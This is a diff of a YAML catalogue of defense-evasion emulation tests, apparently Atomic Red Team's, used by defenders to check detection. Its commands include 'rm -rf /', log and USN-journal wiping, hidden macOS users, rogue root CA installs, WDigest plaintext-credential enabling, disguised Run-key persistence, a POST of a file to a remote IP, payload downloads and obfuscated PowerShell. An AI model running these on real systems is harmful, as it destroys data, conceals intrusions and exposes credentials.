@@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null -' + ' executor: command: 'Remove-Item -path #{file_to_delete} -' + ' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 @@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null -' + ' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse -' + ' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. -' + ' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null -' + ' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) -' + ' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) -' + ' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null -' + ' executor: command: 'Remove-Item #{teamviewer_log_file} -' + ' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line -' + ' supported_platforms: - macos input_arguments: @@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} -' + ' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory -' + ' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ -' + ' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS -' + ' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" -' + ' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +s #{file_to_modify} -' + ' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib @@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +h #{file_to_modify} -' + ' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools -' + ' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #{filename} -' + ' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS -' + ' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt -' + ' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS -' + ' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES -' + ' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO -' + ' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) -' + ' supported_platforms: - macos input_arguments: @@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin -' + ' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} -' + ' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore -' + ' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells -' + ' supported_platforms: - linux - macos @@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files -' + ' supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. -' + ' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: -' + ' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: -' + ' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} -' + ' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" -' + ' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl -' + ' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" -' + ' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell -' + ' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil -' + ' supported_platforms: - windows input_arguments: @@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} -' + ' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. -' + ' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. -' + ' supported_platforms: - macos - linux @@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. -' + ' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} -' + ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} -' + ' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ -' + ' supported_platforms: - windows input_arguments: @@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" -' + ' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null -' + ' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } -' + ' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} -' + ' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' -' + ' name: powershell T1036.004: technique: @@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f -' + ' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times -' + ' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) -' + ' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f -' + ' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f -' + ' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f -' + ' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone @@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" -' + ' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) -' + ' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own MSI" -' + ' executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" -' + ' name: command_prompt T1564.004: technique: @@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore -' + ' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 -' + ' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null -' + ' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore -' + ' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete -' + ' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} -' + ' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. -' + ' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe -' + ' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" -' + ' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} -' + ' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f @@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) -' + ' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 